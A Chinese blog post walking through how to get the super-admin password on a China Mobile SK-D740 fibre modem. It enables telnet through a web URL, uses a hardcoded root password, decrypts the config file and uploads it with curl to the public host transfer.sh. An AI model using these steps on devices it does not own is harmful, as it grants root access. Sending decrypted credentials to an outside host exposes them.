移动SK-D740以及类似型号的超管密码获取

网上几乎所有教程都是FTP,我手上这款和教程完全对不上,在咸鱼付费获取了密码一次,也是完全重制的方法

方法

简要流程:开启telnet->获取root->导出配置并上传

第一步:给你的路由器后背拍张照

开启telnet

确保可以访问光猫后台页,访问http://192.168.1.1/web/cmcc/gch/telnetCfg_gch.gch?TS_Enable=1开启telnet

提示内容非错误信息,说明,你的也有希望?

登陆telnet

打开终端,输入: telnet 你的光猫地址

账号为admin,密码是路由器后背的sn码,SN:XXXX,按回车登陆,出现$代表登陆成功

获取root并上传配置文件

输入 su ,密码是: aDm8H%MdA (祖传),出现#

依次输入

# 解密 db_user_cfg.xml 配置文件
sidbg 1 DB decry /userconfig/cfg/db_user_cfg.xml

# 将解密后的文件传输到 transfer.sh,(网站访问不稳定,可能出现上传失败,多试几次)
curl -v -k --upload-file /tmp/debug-decry-cfg  https://transfer.sh/debug.xml

登陆curl最后一行给出的地址,下载配置文件

用任意编辑器打开,搜索 CMCCAdmin ,即可找到密码

不用上传

使用vi,cat等命令其实也能看,但文件确实比较大,看起来应该比较痛苦

没有测试过这个文件的行数是不是固定的,如果是固定的,使用sed命令访问1539与1540行同样可以得到密码

HOLY SHIT

1月搞了个志强E5+华南主板的家里云计划,最终赶在开学前也算是把电脑给装起来了,同时,如何尽可能利用现有网络(移动)连接家里云也是计划之中的事。最简单便捷的方法就是使用公网ipv6,而现实是存在v6防火墙,使☁️无法被外网访问。前两天斥资30在闲鱼上破解了光猫密码并改为桥接,但发现使用桥接时,网络下行只能跑到100M(正常500+),遂使用更保守的使用光猫拨号+修改光猫的IPv6Session防火墙,但光猫只要断电重启,防火墙设置就会恢复,解决方法有(1.telnet中添加自启脚本(存在校验,可能需要刷固件(无相关)/风险大),2.删除TR069(担心出问题时无法正常下发配置),3.每次断电后进后台重新关闭防火墙(需要稳定的超管密码))

评论

  • a

    2024-07-24

    请问配置文件里搜不到CMCCAdmin,甚至User都搜不到怎么办